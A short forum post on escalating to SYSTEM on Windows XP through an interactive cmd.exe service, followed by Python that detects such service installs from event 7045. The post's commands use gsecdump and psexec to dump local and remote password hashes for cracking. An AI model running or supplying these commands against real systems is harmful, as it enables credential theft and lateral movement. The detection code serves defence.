Title: Hash injection attack
Author: admin   Time: 2012-11-6 21:09

To get a DOS prompt as NT SYSTEM:

C:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact
[SC] CreateService SUCCESS

C:\>sc start shellcmdline
[SC] StartService FAILED 1053:
The service did not respond to the start or control request in a timely fashion.

C:\>sc delete shellcmdline
[SC] DeleteService SUCCESS

------------

Then in the new DOS window:

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>whoami
NT AUTHORITY\SYSTEM

C:\WINDOWS\system32>gsecdump -h
gsecdump v0.6 by Johannes Gumbel (johannes.gumbel@truesec.se)
usage: gsecdump [options]
options:
-h [ --help ]            show help
-a [ --dump_all ]        dump all secrets
-l [ --dump_lsa ]        dump lsa secrets
-w [ --dump_wireless ]   dump microsoft wireless connections
-u [ --dump_usedhashes ] dump hashes from active logon sessions
-s [ --dump_hashes ]     dump hashes from SAM/AD

Although I like to use:

PsExec v1.83 - Execute processes remotely
Copyright (C) 2001-2007 Mark Russinovich
Sysinternals - www.sysinternals.com

C:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT

to get the hashes from active logon sessions of a remote system.

These are a lot better than getting a cachedump of the Cached Credentials because these hashes are LM hashes that can be easily broken with Rainbow Tables.
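From the defender's side, the first step in the post (an ad-hoc service whose binary is cmd.exe) is exactly what the Service Control Manager records in the System log as event 7045 ("A service was installed in the system"). The Python below is an added example, not part of the post, that flags such installs; the two sample messages are constructed, and their field layout is assumed to match the SCM 7045 message text.

```python
import re
from typing import List, Optional

# Constructed sample 7045 message bodies. The first mirrors the service the post
# creates (binary is cmd.exe, runs as LocalSystem); the second is a benign
# install for contrast.
SAMPLE_EVENTS = [
    """A service was installed in the system.

Service Name:  shellcmdline
Service File Name:  C:\\WINDOWS\\system32\\cmd.exe /K start
Service Type:  user mode service
Service Start Type:  demand start
Service Account:  LocalSystem""",
    """A service was installed in the system.

Service Name:  Spooler
Service File Name:  C:\\WINDOWS\\system32\\spoolsv.exe
Service Type:  user mode service
Service Start Type:  auto start
Service Account:  LocalSystem""",
]

# Interpreters that should not be the service binary itself.
SHELL_BINARIES = ("cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe")

FIELD_RE = re.compile(
    r"^(Service Name|Service File Name|Service Account):\s*(.*)$", re.M)


def parse_7045(message: str) -> dict:
    """Pull the labelled fields out of a 7045 message body."""
    return {key: value.strip() for key, value in FIELD_RE.findall(message)}


def service_exe(path: str) -> str:
    """Bare executable name from a service image path, honouring quotes."""
    p = path.strip()
    if p.startswith('"'):                 # "C:\Program Files\x\svc.exe" -arg
        end = p.find('"', 1)
        p = p[1:end] if end > 0 else p[1:]
    else:                                  # C:\WINDOWS\system32\cmd.exe /K start
        p = p.split()[0] if p else ""
    return p.rsplit("\\", 1)[-1].lower()


def suspicious_service(message: str) -> Optional[str]:
    """Reason string if the new service is really a shell, else None."""
    fields = parse_7045(message)
    exe = service_exe(fields.get("Service File Name", ""))
    if exe in SHELL_BINARIES:
        return (f"{fields.get('Service Name')}: service binary is a shell "
                f"({exe}) running as {fields.get('Service Account')}")
    return None


def scan(events: List[str]) -> List[str]:
    """Run the check over a batch of 7045 message bodies."""
    return [hit for hit in map(suspicious_service, events) if hit]
```

Feed the same function the message text of real 7045 events (for example exported with wevtutil) and alert on any hit; a service whose image is a shell interpreter is a rare enough install to be worth a ticket every time.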